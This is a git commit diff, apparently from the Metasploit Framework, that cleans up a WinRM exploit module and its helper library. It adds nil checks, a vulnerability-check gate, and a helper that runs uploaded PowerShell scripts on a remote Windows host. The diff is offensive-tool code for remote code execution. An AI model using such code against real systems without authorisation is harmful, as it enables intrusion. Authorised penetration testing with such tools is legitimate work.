Some minor code cleanup

David Maloney · David Maloney · commit fca8208171e4 · 2012-11-04T14:45:15.000-06:00
diff --git a/lib/msf/core/exploit/winrm.rb b/lib/msf/core/exploit/winrm.rb
@@ -189,16 +189,19 @@ def parse_wql_response(response)
 	end
 
 	def winrm_get_shell_id(response)
+		return nil if response.nil?
 		xml = response.body
 		shell_id = REXML::Document.new(xml).elements["//w:Selector"].text
 	end
 
 	def winrm_get_cmd_id(response)
+		return nil if response.nil?
 		xml = response.body
 		cmd_id = REXML::Document.new(xml).elements["//rsp:CommandId"].text
 	end
 
 	def winrm_get_cmd_streams(response)
+		return nil if response.nil?
 		streams = {
 			'stdout' => '',
 			'stderr'   => '',
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -74,6 +74,8 @@ def check
 			print_error "The Remote WinRM  server  does not appear to allow Negotiate(NTLM) auth"
 			return Msf::Exploit::CheckCode::Safe
 		end
+
+		return Msf::Exploit::CheckCode::Vulnerable
 	end
 
 	def powershell2?
@@ -116,12 +118,16 @@ def powershell2?
 		end
 		streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
 		if streams['stdout'].include? 'Unrestricted'
+			print_good "Set Execution Policy Successfully"
 			return true
 		end
 		return false
 	end
 
 	def exploit
+		unless  check == Msf::Exploit::CheckCode::Vulnerable
+			return
+		end
 		if powershell2?
 			path = upload_script
 			return if path.nil?
@@ -167,20 +173,7 @@ def upload_script
 	def exec_script(path)
 		print_status "Attempting to execute script..."
 		cmd = "powershell -File #{path}"
-		resp,c = send_request_ntlm(winrm_open_shell_msg)
-		if resp.nil?
-			print_error "Got no reply from target"
-			return
-		end
-		unless resp.code == 200
-			print_error "Got unexpected response from #{ip}: \n #{resp.to_s}"
-			return
-		end
-		shell_id = winrm_get_shell_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id))
-		cmd_id = winrm_get_cmd_id(resp)
-		resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id))
-		streams = winrm_get_cmd_streams(resp)
+		winrm_run_cmd_hanging(cmd)
 	end
 
 	def encoded_psh(script)
@@ -210,6 +203,6 @@ def temp_dir
 		return streams['stdout'].chomp
 	end
 
-
+	
 
 end
